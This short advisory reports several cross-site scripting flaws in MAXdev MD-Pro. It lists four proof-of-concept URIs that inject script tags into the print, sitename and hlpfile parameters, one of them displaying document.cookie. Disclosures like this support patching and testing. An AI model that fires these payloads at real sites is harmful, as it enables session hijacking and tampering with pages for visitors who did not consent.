MAXdev MD-Pro Multiple Cross-Site Scripting Vulnerabilities

MAXdev MD-Pro Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/modules.php?op=modload&name=subjects&file=print&print=<script>alert('LOL')</script>
http://www.example.com/modules.php?op=modload&name=Messages&file=bb_smilies&sitename=</title><script>alert(LOL')</script>
http://www.example.com/modules.php?op=modload&name=Messages&file=bbcode_ref&sitename=</title><script>alert(LOL')</script>
http://www.example.com/javascript/openwindow.php?hlpfile=")<html><script>alert(document.cookie)</script>